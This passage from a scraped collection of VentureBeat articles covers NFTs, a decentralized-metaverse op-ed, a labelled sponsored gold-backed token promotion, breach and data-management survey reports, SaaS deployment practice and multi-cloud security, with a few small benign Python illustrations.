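        self._owner_of[token_id] = owner

    def owner_of(self, token_id):
        # Public read: anyone can confirm who owns the token.
        return self._owner_of[token_id]

    def transfer(self, token_id, sender, recipient):
        # Only the current owner can transfer -- the "to the exclusion
        # of all others" property in the quote above.
        if self._owner_of.get(token_id) != sender:
            raise PermissionError("sender is not the owner")
        self._owner_of[token_id] = recipient

ledger = TokenLedger()
ledger.mint("ape-1", "0xAlice")
ledger.transfer("ape-1", "0xAlice", "0xBob")
print(ledger.owner_of("ape-1"))  # -> 0xBob
```

On a real chain the ledger is replicated across nodes and the "sender" check is a cryptographic signature check rather than a string comparison, but the shape of the guarantee is the same.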
“The onus is not on the consumer in adopting cryptocurrency as a legitimate asset, it’s on the technological partners and on the businesses that are creating these projects,” Marcus said. And that probably means offering a frictionless value proposition for the consumer, where they gain benefits without having to dive into the nitty-gritty of how crypto actually works. In the NFT space, the virtual basketball trading card product NBA Top Shot is a great example. You can withdraw and deposit cash in USD fairly easily to buy and sell, with few hoops to jump through. “But if I compare that to an NFT project on the Ethereum network like Bored Ape Yacht Club, I have to open a digital wallet, deposit my fiat currency into that, exchange it for a digital currency, pay the gas and transaction fees, and eventually convert everything back and go withdraw the money at the ATM,” he said. “The onus really isn’t on us as consumers to figure out how to make this work. But I can’t wait to see where the technology goes to make it easier.” It’s inevitable that we’ll move in this direction, Heby said. “Compare the U.S. dollar, how long it’s been around, to Bitcoin,” he said. “We have at least a hundred-plus years on it with the U.S. dollar. That’s the marketing problem. People like things that have history behind them. As we get more and more history, there are going to be some changes, and it’ll be something that becomes more widely accepted. For now, there are still transactions going on in the metaverse. There will continue to be transactions going on.”
"
15,107
2,022
"Why the future of the metaverse can only be decentralized | VentureBeat"
"https://venturebeat.com/2022/03/05/why-the-future-of-the-metaverse-can-only-be-decentralized"
"Guest
Why the future of the metaverse can only be decentralized

This article was contributed by Justin Sun, Permanent Representative of Grenada to the WTO and the founder of TRON. The race to the metaverse is on, featuring runners and riders from tech giants like Meta, Microsoft, and Epic to blockchain old-schoolers like Decentraland and Somnium Space. The only problem is that it looks suspiciously like a repeat of the “format wars” we’ve seen play out time and time again. Just look at the current video streaming fiasco: we now need to subscribe to ten different streaming services to watch the shows we actually want to watch. It’s the same old cycle we’ve seen play out in decades of centralized tech, from VHS versus Betamax in the 1980s to Facebook versus MySpace a decade ago. Now, Microsoft and Meta are squaring up in their bid to dominate the virtual space.

A dystopian vision?
Tech stock investors can look away now, but these attempts are doomed to fail. Meta’s bid to compete with Microsoft by penetrating the enterprise workspace metaverse has already landed badly. Meanwhile, Mark Zuckerberg’s vision of a centralized Facebook-style social metaverse has been dubbed “dystopian” by one of the firm’s earliest supporters. Microsoft itself appears to have a zig-zag approach to realizing its metaverse ambitions. Following Meta’s renaming last year, Microsoft was quick to jump in with its announcement that Teams was to be developed into the workspace metaverse of choice, leveraging its vast base of enterprise users. Within a matter of weeks, the firm also announced its biggest-ever acquisition in a takeover of gaming firm Activision Blizzard, with CEO Satya Nadella going on to tell the FT in an interview that he believes the future of the metaverse is in gaming. So under this centralized vision, we’re going to have AR-enabled PowerPoint presentations by day and 3D social networks aimed at harvesting yet more data by night. It’s hardly surprising that people aren’t getting excited. While big tech firms slug it out to realize their vision of what we want, decentralized metaverses and Web3 initiatives are currently attracting record investment, pulling in around $30 billion in venture capital last year. What can these investors see that Meta and Microsoft are missing? That the potential of Web3 as the digital infrastructure of the future cannot be overlooked when envisioning a metaverse.

The power of DAOs

The ideal metaverse should not only break technological barriers by offering an unparalleled user experience; it is also an opportunity to transform the big tech business model that we’ve all come to know and dislike.
Rather than operating services designed to extract monetary value from users, Web3 innovators create platforms that aim to empower people. Truly autonomous creations where the users are, if not the owners in the traditional sense of the word, then the beneficiaries. The only way to think of the ideal metaverse is through the building blocks laid by decentralized autonomous organizations, or DAOs. The world is only just waking up to the transformative power of DAOs, which have made headlines for attempts to buy a copy of the US Constitution , crowdfund legal fees for Julian Assange , and lower the barriers to entry for real estate investing. In the decentralized finance movement, DAOs are now the norm rather than the exception, and now that they’re beginning to penetrate the mainstream, it’s only a matter of time before this model extends to other platforms and protocols, too. How can we be sure of this? Because from the users’ perspective, the DAO model offers unbeatable value. We all know that in the traditional social media model, we – or rather our data – are the product that generates value. Each update or “improvement” simply attempts to extract more revenue from our data. However, users don’t see any of this value – instead, it’s funneled back to shareholders. A social network based on a DAO upends this model to return value to those who generate it. Users have an ownership stake in the platform, and assuming it operates using the same ad-based revenue model, the user will receive a share of these revenues as a reward for their engagement. Unparalleled network effects The network effects of such a model would be unparalleled because the incentives are aligned. Users – let’s go crazy and just call them people now – will want their friends and family to join so they can also participate in the rewards and make the network a better place to hang out. 
The more people join, the more developers want to build third-party apps and services to tap into this growing community of active, engaged people who are happy to be there, and the positive cycle continues. What’s more, thanks to the underlying blockchain infrastructure, people own the assets and benefits they accrue on any given platform. In the Web2 model, we don’t own anything so we end up tied into platforms and services simply so we can benefit from the work we’ve put into them over the years. Closing a social media account means losing followers, closing a streaming service means losing playlists and access to streaming material, closing an online marketplace listing wipes out a carefully-built customer directory. In the Web3 world, we own our assets, so we can carry them with us across different platforms without fear of being penalized. This also has the potential to make assets exponentially more valuable than they are in the Web2 world. For instance, Spotify has put the world’s music library in our pockets, but the cost of doing so has reduced the value of a music track to fractions of a cent. But if a piece of music is tied to an NFT that can be owned and played on any platform or device, it becomes worth more to the listener – and the artist is the one reaping 100% of that extra value. Decentralization is the only viable model Coming back to the tension between centralized metaverses and decentralized ones, it’s unclear how the two can co-exist. Following Twitter’s lead, Meta is rumored to be rolling out NFT support for Facebook and Instagram and even launching its own NFT marketplace. It’s hard to imagine who would want to mint NFTs that only work in a closed ecosystem, but it’s even harder to imagine Meta, or any of the other big tech firms, launching NFTs that permit interoperability with the established blockchain infrastructure. So big tech has a choice. 
Embrace the open, decentralized nature of the future in the metaverse, or continue operating closed ecosystems that are only designed to extract value at the expense of their most valuable assets. Because once people begin to understand that Web3 empowers them to own their data, their follower counts, their customers, all the value they accrue online, and take it with them, the “Web 2.0” business model is no longer attractive or sustainable. Justin Sun is the Permanent Representative of Grenada to the WTO and the founder of TRON.

DataDecisionMakers: Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! "
15,108
2,021
"How gold-backed cryptocurrency is changing the modern investment landscape | VentureBeat"
"https://venturebeat.com/2021/07/12/how-gold-backed-cryptocurrency-is-changing-the-modern-investment-landscape"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Sponsored How gold-backed cryptocurrency is changing the modern investment landscape Share on Facebook Share on X Share on LinkedIn Presented by Asia Broadband The proliferation of online markets and the introduction of new cryptocurrencies has launched a brand-new type of token. Companies are now digitizing the value proposition of gold, one of the oldest, most stable currencies in the world. The result is a liquid crypto asset backed by the benefits of physical gold. Blockchain technology enables financial leverage, liquidity, and monetized physical gold holdings. In 2021, Bitcoin and Ethereum have been the market leaders, posting record highs for investors. But then came the crash in the wake of Elon Musk’s offhanded tweets, plus China promising increased regulation. This kind of volatility attracts recreational investors who see big risks as the natural corollary of even bigger gains. But more cautious investors have stayed on the sidelines, unwilling to take those chances. Historically, gold has been a protective hedge against inflation. 
Experts like Timothy Ord, president and editor of The Ord Oracle, predict that gold stocks could see 10X gains in the next three years. In addition, Wall Street gold estimates are bullish for 2021. Gold is expected to hit $2,300-$2,400 an ounce, Goldman and Citibank say, and the metal looks poised to continue the bullish trend that started back in September 2018. This innovation comes at a time when investors have been searching for safe havens. They’re facing massive amounts of liquidity in the economy, created by government stimulus programs that were designed to shield the economy from the impact of the pandemic. Tether offers a more stable crypto investment, protected from the bigger crypto market swings, but even fiat-currency-backed cryptos are vulnerable to potential inflation, and investors are wary of how that can impact the currency’s buying power over time. To hedge against these inflation fears, investors have turned to commodity-backed cryptocurrency projects, such as those leveraging safe-haven commodities like precious metals as their store of value. For cautious investors, gold-backed tokens combine the structure of gold investments with the scarcity, flexibility, and upside potential of the crypto world. And they’re set to bridge the gaps for investors who are uncomfortable launching into the world of cryptocurrency investing, those who dislike fiat currency, and those who are looking for more secure investments. Asia Broadband, Inc. (OTC: AABB) is entering the fray with its AABB Gold token (AABBG). It’s a gold-backed currency, but the company is going a step further with its unique proposition: the gold backing its token is produced directly by its own gold mines. “Backing currency with gold offers investors a major competitive advantage over other junior mining companies,” says Chris Torres, CEO of Asia Broadband, Inc. (OTC: AABB).
“The unique mine-to-token product can become a worldwide standard of exchange, secured and trusted with gold backing.” The company is acquiring highly prospective gold projects in Latin America and distributing production through an extensive global sales network. In January, Asia Broadband sold its main mining operations in the Guerrero gold belt in Mexico for $82 million. The sale produced $30 million in gold bullion, which provides the backing for the company’s tokens. The company will continue to strategically target gold mineral properties to back continuing token sales, Torres says, but if token demand exceeds the company’s supply of gold, bullion is available from third-party sources and can be purchased using the proceeds from token sales. The minimum price of the AABBG token is maintained at the current spot price of gold, which reduces purchasers’ investment risk, Torres adds. On the flip side, the token price will rise with the price of gold. Since the pandemic, the value of gold has continued to rise, Torres says. “We believe the price of gold will increase over $2,000 to $3,000 an ounce over the next 24 months,” he explains. “And the rising price of gold is just the minimum company-supported price of our AABBG token, which adds security to investors. Most importantly, the token price will continue to appreciate based on its market demand and the limited supply of tokens available for purchase and exchange.” The company has released only 5.4 million tokens to this point, or the equivalent value of the gold bullion in the company’s treasury. “In 2020, AABB saw $16.8 million in gross profits, and as gold mining operations move forward, we expect revenues and gross profits to be strong in 2021 — surpassing our previous year’s achievement,” he says. The company’s primary goal is to make its token a worldwide standard of exchange, Torres says.
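The floor-price peg described above (a token minimum maintained at the gold spot price) can be sketched in a few lines. This is an illustration only; the grams-of-gold-backing-per-token figure below is a hypothetical parameter, not a published AABBG number.

```python
# Hypothetical sketch of a gold-pegged token floor price. The backing amount
# per token is an assumed illustrative figure, not AABBG's actual ratio.

GRAMS_PER_TROY_OUNCE = 31.1035  # standard troy-ounce-to-gram conversion

def token_floor_price(spot_usd_per_oz: float, grams_backing_per_token: float) -> float:
    """Minimum supported token price: the market value of the gold backing it."""
    usd_per_gram = spot_usd_per_oz / GRAMS_PER_TROY_OUNCE
    return usd_per_gram * grams_backing_per_token

# With gold at $1,866.21/oz and 0.1 g of backing per token, the floor is $6.00.
print(round(token_floor_price(1866.21, 0.1), 2))  # → 6.0
```

As the article notes, this floor rises with the spot price, while market demand can push the traded price above it.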
It’s working now to aggressively expand token circulation to the primary sales markets in North America and Europe, and also globally. The company has been developing its own proprietary exchange, which will allow AABB Wallet users to complete quick two-way exchanges of their AABB Gold tokens for major cryptocurrencies such as Bitcoin, Ethereum, and Litecoin. The proprietary exchange will also add to transaction fee revenues and allow for the price appreciation of AABBG beyond the price of gold, influenced by market demand and the limited supply of tokens released into circulation. The exchange is on track for testing in mid-August, with the live exchange launch expected in early September. For more information on the AABBG token, visit www.aabbgoldtoken.com Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. Content produced by our editorial team is never influenced by advertisers or sponsors in any way. For more information, contact [email protected]. "
15,109
2,020
"Canalys: More data breaches in 2020 than previous 15 years despite 10% growth in cybersecurity spending | VentureBeat"
"https://venturebeat.com/2021/03/29/canalys-more-data-breaches-in-2020-than-previous-15-years-despite-10-growth-in-cybersecurity-spending"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Canalys: More data breaches in 2020 than previous 15 years despite 10% growth in cybersecurity spending Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. As cyberattacks increase, it’s hard not to wonder if enterprises are fighting a losing battle. According to a new report by Canalys , companies are spending record sums on cybersecurity, and yet the number of successful attacks is higher than ever. Canalys’ report noted that “more records were compromised in just 12 months than in the previous 15 years combined.” These are being driven in particular by ransomware attacks that have become more severe, in some cases disrupting hospitals. These attacks have also caused some companies to shut down and others to put emergency response plans in place to avoid being shuttered. This carnage is happening despite the fact that cybersecurity investment grew 10% in 2020 to $53 billion. So what’s going on? 
Canalys believes that companies are still under-investing in cybersecurity. During the pandemic, other areas of IT grew faster, signaling that enterprises were placing an emphasis on services that would help them remain stable during the pandemic or even grow, rather than on protecting their infrastructure from attack. Indeed, some enterprises may have increased their vulnerability by responding to the pandemic in ways that ignored their safety policies. But the real culprit may simply have been failing to make security a top priority. Compared to the 10% growth in cybersecurity spending, cloud infrastructure services grew 33% in 2020, cloud software services rose 20%, notebook PC shipments jumped 17%, Logitech’s webcam sales increased 138%, and Wi-Fi router sales surged 40%. “Cybersecurity must be front and center of digital plans, otherwise there will be a mass extinction of organizations, which will threaten the post-COVID-19 economic recovery,” said Canalys Chief Analyst Matthew Ball in a statement. “A lapse in focus on cybersecurity is already having major repercussions, resulting in the escalation of the current data breach crisis and acceleration of ransomware attacks.” "
15,110
2,021
"Report: Flawed data management leads to lost revenue for most companies | VentureBeat"
"https://venturebeat.com/2021/11/17/report-flawed-data-management-leads-to-lost-revenue-for-most-companies"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Report: Flawed data management leads to lost revenue for most companies Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. According to a new report by Fivetran and Wakefield Research, 85% of data leaders surveyed say flawed data management leads to poor decision-making and lost revenue. Overall, the results provide a detailed look at where these data management processes are failing and why data and analytics leaders are struggling to keep up. Nearly 3 in 4 data and analytics leaders (72%) say their team’s time is being wasted on manual oversight of data pipelines — a poor use of time and talent. Sixty-nine percent of data and analytics leaders say their business outcomes at their company would be somewhat or significantly improved if their data team were able to contribute more to business decisions rather than manual pipeline management. The manual approach is full of inefficiencies and not at all optimized. 
Eighty percent of those surveyed admit they have to rebuild data pipelines after deployment in response to changes such as updated APIs. In addition to being error-prone, the process for deriving valuable insight from the data with manual pipelines is extremely slow. Only 13% report being able to derive value from newly collected data in minutes or hours. For 76% of companies, including 74% of companies with $500 million-plus in revenue, it takes days or up to a week to prepare the data for revenue-impacting decisions. The Fivetran survey was conducted by Wakefield Research among 300 data and analytics leaders, VP and above; in the U.S., U.K., Germany, and France; at companies with $100 million+ in annual revenue, a minimum of 100 employees, and who are familiar with the data strategy/data use at their organization; between September 27 and October 12, 2021, using an email invitation and an online survey. Read the full report by Fivetran and Wakefield Research. "
15,111
2,022
"How a skilled advocate can improve SaaS technology transformation | VentureBeat"
"https://venturebeat.com/2022/02/22/how-a-skilled-advocate-can-improve-saas-technology-transformation"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community How a skilled advocate can improve SaaS technology transformation Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Thomas Donnelly, chief information officer of BetterCloud. Technology progress is hobbled in the enterprise. It’s time to un-hobble it. Technology transformation is fundamental to every business that aims to run well and compete successfully. Our organization focuses on helping companies manage technology change and use it to transform — for the better — how departments do business. This gives us a continuous view of what works well in deploying new software-as-a-service (SaaS) apps. We also experiment internally to improve our own business agility and expansion, and we’re here to explain what we found works best for tech transformation. While it’s ideal to plan and coordinate new technology imperatives strategically, many IT groups are trapped in reactive mode. 
As a result, they are off-balance and unprepared, and key considerations get overlooked. We’re going to recommend that you try a new method to leapfrog over the struggles of reactive mode. First, though, let’s look at what tends to go wrong with technology (SaaS, in particular) deployments. Application deployment projects are often frustrated by waits for some other department to finish a particular task. While you wait, forward movement is blocked. An implementation team can help by organizing and aligning the participants, who are typically busy and don’t see SaaS deployments as their top priority. Operating departments and their project participants typically have a very “local” perspective, so they are not aware of applications, data, or deployments in other departments. That leads to duplications and avoidable mismatches or incompatibilities. Most companies are functional hierarchies. That can mean resistance to implementing applications across functions. Marketing is here; finance is separate over there. Sales is on another island. Departmental boundaries make it difficult to sync enterprise data with silos, so data integration takes inordinate effort. Implementers may take the easy route and create a silo for one workgroup. That immediately gives birth to problems that are tough to fix later. Nearly every company wants to implement more effectively across the enterprise and also avoid data and process silos. There are often tradeoffs between meeting today’s needs in one department and fulfilling enterprise objectives. The department may prefer a specific app and vendor based on past familiarity, but the company seeks to avoid adding new SaaS vendors when a suitable application is already deployed in another department.
The embedded technology advocate and business analyst for SaaS initiatives In our experience, people are the key to technology transformation. Our SaaS initiatives enjoyed better outcomes when we embedded business analysts in departments, where they act as business partners, aligning technology with departmental objectives and corporate strategy. Their job starts with understanding a department’s needs. These analysts, whom we dubbed “embedded technology advocates,” or advocates, are good at building trust and managing projects. An embedded advocate helps with SaaS projects in requirements definition, technology choices, implementation, and user onboarding/privilege assignment. They attend department meetings, understand the challenges, help propose future initiatives, and build constructive relationships that bridge between departments, IT, and senior management. They work daily to align a department’s apps, data, and processes with the rest of the enterprise. How we went about it We established a group of advocates (feel free to label them tech guides or simply business analysts) who embed with each functional department. Each advocate typically represents two or three departments at once to the enterprise and IT. They stay busy; an embedded advocate at a large company may take part in 10 to 30 deployments per year, or more. Some deployments will be multiple rollouts of the same app, but in different departments. We quickly saw that with advocates, the technology choices and deployments worked better. It was easy to see why. On their own, functional departments like marketing, sales, and purchasing are challenged to plan and complete new SaaS projects, especially when it comes to taking a cross-functional, enterprise view. Advocates quickly became experts in the subject of SaaS selection and implementation. To find embedded advocates, you can both hire internally and recruit outside. Look for project management skills and operational experience.
Sales operations and finance experience have worked out well in this “analytic extrovert” role. Putting embedded tech and SaaS advocates into action Once assigned, the technology advocates meet regularly with their constituent departments and the IT, security, and deployment teams. They learn the department’s processes and which data is important. The advocates become their department’s primary contact for technology changes. The advocate pulls the necessary contributors into a project when needed, which cuts the workload significantly. An advocate actually makes technology decisions on behalf of the department, or at least plays an influential role in them. In this kind of structure, the advocate becomes trusted by the departments as well as by IT and security, and can be a trusted guide. The results are encouraging The results are promising. SaaS implementations and onboarding go faster, without disrupting operational teams. Creation of silos stops. The advocate completes work that department stakeholders don’t have the time, focus, cross-functional knowledge, or motivation to do. We saw the embedded advocate approach reduce the time expended on SaaS implementations and deter information silos. It helps make departmental data widely accessible and more valuable to the company. Local “invisible” silos can hold information valuable to other departments; those departments shouldn’t be in the dark about what’s there and how it’s used. Advocates are committed to leveraging data; they work to synchronize and integrate silo data with enterprise resources. Whether an advocate embeds with two or three departments at once depends on their experience, creativity, and problem-solving ability. Advocates smooth the path and accelerate technology transformation. That brings IT to the forefront with more deployment successes, better data utilization, and positive reviews. The embedded technology advocate approach has been highly effective here.
We now recommend it to our customers who may deploy 20, 30, or even more applications yearly. We are excited to see the results it brings for them. Thomas Donnelly is chief information officer of BetterCloud. "
15,112
2,022
"The difficulty of scaling a Frankencloud | VentureBeat"
"https://venturebeat.com/2022/03/14/the-difficulty-of-scaling-a-frankencloud"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community The difficulty of scaling a Frankencloud Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Kelley Kirby, product marketing analyst at Uptycs Let’s talk about the cloud (because who isn’t?). Over the last several years, we’ve seen cloud adoption skyrocket as organizations work to find the most efficient and cost-effective way of operating their business. Whether the cloud environment be public, private, hybrid or multi-cloud, this worldwide growth has led to a steady increase in available cloud services, their providers, and configurations. Back in 2019, 81% of public cloud users reported using two or more providers (pre-pandemic, so you can imagine how much that number has grown), and while the benefits of cloud use far outweigh the risk, it can come with some glaring challenges as you try to grow your business. 
For a small organization running a handful of services and applications and deploying workloads with a single cloud provider, cloud management seems simple. But the story is very different for a growing enterprise with assets and workloads across multiple cloud providers, complex data lakes, services hosted in various geolocations, and an array of tools that don’t offer support for every piece of your cloud estate. This complicated cloud amalgamation (Frankencloud, if you will) is often a result of initial cost efficiency or acquisition, but whatever the case, scaling that convoluted architecture as your business evolves is hard. Cloud scaling challenges When your business started, the idea of cloud adoption was an easy one to wrap your head around. It’d simplify a number of your business processes, increase data accessibility, improve efficiency, and reduce overall operational costs. In theory, cloud computing would make scaling your organization as it grew much easier. And it did! But, alas, the ease has passed since your business took off. You now have a multitude of cloud instances running services and workloads across three major providers in an attempt to cut costs and avoid vendor lock-in, have acquired a small firm using a private cloud hosted in the EU with new regulations to adhere to, and have more tools to help manage it all than you can count on two hands. Simply put, it’s gotten overwhelming and now you’re trying to figure out how to scale up. The fact of the matter is, the more complex your environment gets, the more difficult scaling is going to be. Let’s take a look at some of these challenges and what they could mean for your business. Configuring your Frankencloud across providers Configuration for your applications, infrastructure, and workloads is not going to be the same across cloud providers.
Each provider has its own way of provisioning, deploying, and managing instances, and it’s your responsibility to ensure the correct configuration of your resources. It can be tempting to rush through the configuration process (because going through the motions multiple times takes ages and you have a million other things to do), but it’s endlessly important to make sure you’ve configured your resources correctly and are rechecking them frequently as things change to avoid compliance and security risks. A misconfiguration could mean non-compliance associated with regulatory fines or, heaven forbid, a security breach, and scaling too quickly without keeping your configurations in check could cost you. Like, a lot. According to IBM’s Cost of a Data Breach Report 2021, the more complex your environment is and the more you’re failing compliance checks, the more likely you are to pay up to $2.3M more in the event of a breach. This brings me to the next challenge of… Securing your Frankencloud With the Shared Responsibility Model largely leaving the onus on the customer to secure their own cloud environment, there’s not a whole lot that comes built in to work with. This means that hardening your environment, implementing security controls, refining privileges and identities, and identifying and remediating vulnerabilities are now consistently at the top of your cloud scaling to-do list. And since the responsibilities vary for each provider, you must figure out what’s required for each one. There are guidelines to help you achieve some of this on your own, like the AWS Well-Architected Framework Security Pillar or CIS Benchmarks, and a plethora of cloud security vendors ready to help you pick up the slack, but the trouble is rolling out these security measures for your entire cloud estate in a way that ensures complete coverage from end to end.
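The recurring configuration recheck described above can be sketched as a small rule-driven audit. Everything here is hypothetical for illustration; the resource fields and rules are made up, not any provider's real API.

```python
# Illustrative rule-driven configuration audit. The resource shape and the
# rules are hypothetical stand-ins for provider-specific checks (e.g., the
# kinds of controls CIS Benchmarks enumerate).

RULES = [
    ("public access disabled", lambda r: not r.get("public", False)),
    ("encryption at rest enabled", lambda r: r.get("encrypted", False)),
]

def audit(resources):
    """Return (resource_id, failed_rule) pairs for every violated rule."""
    findings = []
    for resource in resources:
        for rule_name, passes in RULES:
            if not passes(resource):
                findings.append((resource["id"], rule_name))
    return findings

resources = [
    {"id": "bucket-a", "public": True, "encrypted": True},
    {"id": "bucket-b", "public": False, "encrypted": False},
]
print(audit(resources))
# → [('bucket-a', 'public access disabled'), ('bucket-b', 'encryption at rest enabled')]
```

The hard part is running an equivalent audit consistently across every provider in the estate, since each one exposes configuration differently.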
This is especially challenging because very few cloud security vendors offer support for multiple cloud providers, and the ones that do often have a very limited toolset designed for a particular use case. This has resulted in security teams compiling several tools from multiple security vendors in an attempt to cover all the bases (FrankenSec?), but these disconnected and siloed systems typically do not integrate and can only deliver pieces of the whole cloud security picture, leaving blind spots. The blind spots between solutions can allow threat detection signals to go unnoticed because related security events could be happening in two different systems, but the disconnected security solutions aren’t able to correlate them as suspicious. In this case, the only way to discover that the events are related is to manually triage every detection across each system and find the connection yourself. But between the volume of detections you may receive (a number of them being false positives) and the increasing problem of alert fatigue, the margin for error is quite high and you may still miss it anyway. Observing your Frankencloud As with securing your Frankencloud, getting full visibility into your entire cloud estate is a major challenge. You’re faced with the same difficulty of disparate solutions that leave you with an incomplete picture of your cloud environments and resources. Without complete visibility into where your cloud data is, which applications interact with which services, and who has access to what, you could be oblivious to misconfigurations, threats, overspending, and non-compliant policies. Understanding how different resources, identities, and services interact with one another helps you to prioritize configuration fixes, control privilege escalation, and perform audits, ultimately improving resource performance and reducing security risk.
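The missed-correlation problem described above can be shown with a toy example: two alert feeds that each look benign alone, joined on a shared resource within a short time window. All event names, resources, and timestamps are hypothetical.

```python
# Toy cross-system alert correlation: pair alerts from two disconnected
# tools that touch the same resource close together in time.
from datetime import datetime, timedelta

def correlate(feed_a, feed_b, window=timedelta(minutes=5)):
    """Pair alerts from two systems that hit the same resource within the window."""
    pairs = []
    for a in feed_a:
        for b in feed_b:
            if a["resource"] == b["resource"] and abs(a["time"] - b["time"]) <= window:
                pairs.append((a["event"], b["event"]))
    return pairs

t = datetime(2022, 3, 14, 9, 0)
cspm_alerts = [{"resource": "vm-42", "event": "role_escalation", "time": t}]
edr_alerts = [{"resource": "vm-42", "event": "suspicious_process",
               "time": t + timedelta(minutes=2)}]
print(correlate(cspm_alerts, edr_alerts))  # → [('role_escalation', 'suspicious_process')]
```

When the two feeds live in disconnected products, this join never happens automatically; an analyst has to triage each feed and spot the pair by hand.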
The larger your cloud estate gets with gaps in visibility, the harder it’s going to be to do those things effectively. Summary: Scaling your cloud creation Your Frankenstein cloud creation has made scaling a bit of a nightmare (pun intended), but you’re not alone. While no two cloud environments look the same, these challenges are faced by any organization operating in a complex cloud environment. You can find some comfort in knowing that it’s probably not a result of anything you’re doing inherently wrong. To scale a complex cloud environment effectively without creating new headaches for yourself down the road, you’ll need to be able to: Monitor everything that’s going on across cloud providers, including asset relationships and privilege allocation. Ensure end-to-end security with no blind spots from disconnected tool sets. Discover misconfigurations as you evolve to avoid compliance failures and vulnerabilities. Having a single, unified solution that can help you address these challenges all in one place will largely reduce the amount of time, overhead and stress that accompany a complicated cloud scaling project. Kelley Kirby is a product marketing analyst at Uptycs DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! 
DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,113
2,022
"Report: 60% of security threats are precursors to ransomware | VentureBeat"
"https://venturebeat.com/2022/03/22/report-60-of-security-threats-are-precursors-to-ransomware"
"Report: 60% of security threats are precursors to ransomware New research from Red Canary has indicated that by developing robust detection coverage for the techniques adversaries abuse most often, security teams can achieve defense-in-depth against the many threats that leverage those techniques and the broader trends that dominate the infosec landscape. The report is organized into three cascading sections: trends, the threats that comprise those trends and the MITRE ATT&CK® techniques that are leveraged by those threats. Each section includes extensive guidance that security teams can use to mitigate, prevent or detect the malicious activity described in the report. The biggest trend in 2021, not surprisingly, was ransomware. Counterintuitively, Red Canary doesn’t detect much ransomware, and the reason for that is probably the single most important takeaway from the report. 
